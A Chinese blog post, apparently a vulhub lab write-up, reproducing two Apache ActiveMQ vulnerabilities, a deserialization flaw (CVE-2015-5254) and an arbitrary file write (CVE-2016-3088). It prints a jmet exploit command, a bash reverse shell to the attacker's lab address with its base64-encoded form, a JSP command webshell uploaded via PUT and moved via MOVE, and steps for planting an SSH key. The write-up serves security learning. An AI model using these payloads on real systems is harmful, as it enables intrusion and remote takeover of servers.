vulhub靶场漏洞复现——ActiveMQ

最新推荐文章于 2024-08-10 15:20:10 发布
最新推荐文章于 2024-08-10 15:20:10 发布
阅读量307 收藏
点赞数
文章标签: activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pigzlfa/article/details/132831815
版权

AvtiveMQ简介

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。
ActiveMQ详解文章链接——消息中间件ActiveMQ链接

ActiveMQ有两个端口:

web管理端口工作(消息传递)端口
816161616

CVE-2015-5254反序列化漏洞

漏洞原理:
该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码
影响版本: Apache ActiveMQ 5.x —— 5.13.0
漏洞复现:

进入靶场目录
cd ./CVE-2015-5254
启动环境
docker-compose up -d
查看启动环境
docker-compose ps

在这里插入图片描述
访问8161端口
我的vulhub搭在了kali里面,这里用物理机直接访问kali地址:端口号
靶机地址:192.168.102.8
攻击机kali地址:192.168.102.130
在这里插入图片描述
在这里插入图片描述
点击进入管理页面登陆,默认用户名/密码:admin/admin
换了个浏览器…因为之前那个自动登陆了
在这里插入图片描述
在这里插入图片描述使用jmet工具构造可执行命令的序列化对象

下载链接 https://github.com/matthiaskaiser/jmet/

1、发送消息 创建文件夹 /tmp/success
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/success” -Yp ROME 192.168.102.8 61616
在这里插入图片描述可以看到消息成功发送到了中间件,漏洞可以利用
在这里插入图片描述反弹shell

bash -i >& /dev/tcp/192.168.102.130/45678 0>&1

进行base64编码:

YmFzaCAtaSA+JiAgIC9kZXYvdGNwLzE5Mi4xNjguMTAyLjEzMC80NTY3OCAwPiYx

jmet执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,YmFzaCAtaSA+JiAgIC9kZXYvdGNwLzE5Mi4xNjguMTAyLjEzMC80NTY3OCAwPiYx}|{base64,-d}|{bash,-i}” -Yp ROME 192.168.102.8 61616

在这里插入图片描述可以看到web管理页面event 数量变成2
在这里插入图片描述
攻击机监听45678端口
在这里插入图片描述

点击消息触发命令执行
在这里插入图片描述在这里插入图片描述
可以看到成功反弹

CVE-2016-3088任意文件写入漏洞

漏洞原理:
该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。

影响版本: Apache ActiveMQ 5.x —— 5.14.0
漏洞复现:
切换到漏洞目录:
在这里插入图片描述

启动靶场环境,并查看

docker-compose up -d
docker-compose ps

在这里插入图片描述
可以正常访问
在这里插入图片描述利用方式一:
通过PUT方法上传cmd小马,利用MOVE方法移动到可执行目录下,调用马,可以执行任意命令

访问一下,抓个包
在这里插入图片描述

PUT /fileserver/test.txt HTTP/1.1
Host: ip:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

<%@ page import="java.io.*"%>
<%
 out.print("Success!</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

 while((line=br.readLine())!=null){
  out.print(line+"</br>");
 }
%>

在这里插入图片描述返回,写入成功

用MOVE方法移动到可执行目录下(api或者admin都行)

MOVE /fileserver/test.txt HTTP/1.1
Destination:file:///opt/activemq/webapps/admin/test.jsp

在这里插入图片描述
返回204,成功移动

访问一下,成功执行命令whoami
在这里插入图片描述
利用方式二:
写入ssh公钥,实现ssh免密登陆
1、生成密钥对

ssh-keygen -t rsa

在这里插入图片描述在.ssh目录下查看公钥

cat d_rsa.pub

在这里插入图片描述
PUT上传公钥
在这里插入图片描述
MOVE移动到/root/.ssh/并重命名为authorized_keysd

MOVE /fileserver/id_rsa.pub HTTP/1.1
Destionation:file:///root/.ssh/authorized_keys

这里遇到了一个问题,怎么也移动不了,返回500错误
进入容器查看,公钥写入成功
在这里插入图片描述好了,下面开始步步维艰了
查资料是,docker容器要安装sshd服务环境

apt-get install openssh-server

报错,
在这里插入图片描述
用了apt-get update和apt-get upgrade都不行
倒腾大半天,后续再看吧,心累

pigzlfa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[ vulhub漏洞复现篇 ] ActiveMQ反序列化漏洞复现(CVE-2015-5254)
qq_51577576的博客
08-14 3018
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。......
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088
qq_51577576的博客
09-18 1265
[ vulhub漏洞复现篇 ] ActiveMQ任意文件写入漏洞CVE-2016-3088 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接,fileserver是储存文件的接;admin和api都需要登录后才能使用,fileserver无需登录。
vulhub学习(2) Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
yukinorong的博客
06-24 3210
漏洞环境 配置vulhub , 在目录activemq/CVE-2016-3088中打开docker。 docker中显示 此时开启了两个端分别为8161和61616 其中61616是工作端,消息在这个端进行传递; 8161是网络管理页面端 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞原理 ActiveMQ Web控制台分为三个应用程序:admin,api和f
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)复现及排查
dayouzi的博客
08-14 2380
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接,fileserver是储存文件的接;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
新勒索软件,超3000+主机暴露于Apache ActiveMQ 漏洞威胁之下
最新发布
分享web安全、AI安全、云安全、业务安全、渗透测试、安全开发、安全工具、行业动态等优质内容……
08-10 333
超过3,000台可通过Internet访问的Apache ActiveMQ 服务器暴露在一个严重的远程代码执行漏洞影响下,攻击者已开始主动针对该漏洞来释放勒索软件。
ActiveMQ 漏洞
per_se_veran_ce的博客
12-30 490
环境:docker ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 背景简介 ActiveMQ Web控制台分为三个应用程序:admin,ap
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3765
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
m0_74402888的博客
04-30 1345
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端是工作端,消息在这个端上传递;
利用Vulnhub复现漏洞 - ActiveMQ任意文件写入漏洞(CVE-2016-3088)
JiangBuLiu的博客
06-27 1841
可点击目录分类快捷浏览↓Vulnhub官方复现教程漏洞原理背景简述漏洞详情复现漏洞启动环境写入webshell上传webshell设置浏览器代理配置(与Burp拦截设置一致)打开Burp Suite设置拦截端(主机)(与浏览器设置一致)在Burp Suite的拦截抓包中写入WebShell移动到web目录下的api文件夹中:原教程移动到web目录下的api文件夹(/opt/activemq/we...
Vulhub漏洞靶场搭建
javagty6778的博客
03-10 1855
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式。
Vulhub靶场ActiveMQ任意文件上传漏洞复现
X_python321的博客
05-08 548
Vulhub靶场ActiveMQ任意文件上传漏洞复现
vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞
雷根瓦尔德
11-08 1815
Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。 本篇的内容是完成ActiveMQ任意文件写入漏洞(CVE-2016-3088) ActiveMQ介绍:Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 本篇我就先进行一次完整的实验过程,然后再按照...
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 621
Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
ActiveMQ漏洞合集
LainWith的博客
12-26 1468
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端,61616是工作端,消息在这个端进行传递;8161是Web管理页面端。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3045
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
ActiveMQ未授权访问漏洞
starhei.zxy的博客
08-05 165
ActiveMQ是一款流行的开源消息服务器。默认情况下,ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。步骤二:ActiveMQ默认使用8161端,默认用户名和密码是。步骤一:使用以下Fofa语法搜索产品...,在打开的页面输入....
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)复现
m0_69994768的博客
01-23 1161
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)
ActiveMQ  任意文件上传 漏洞 PUT
U_U520的博客
01-10 1234
ActiveMQ Web控制台分为三个应用程序:其中admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;是消息队列的容器,专注于高并发的环境,比如天猫淘宝一秒钟上亿请求,就好比是水池,把大量短时间无法处理的数据,冗余囤积到ActiveMQ里,再分门别类,按类专门处理,从而提高处理效率。方法1 PUT /fileserver/a../../%08/..%08/.%08/%08。注意: 返回包必须是204 才能证明执行成功。
vulhub靶场练习
07-28
- *2* *3* [vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞](https://blog.csdn.net/qq_38632151/article/details/102975086)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值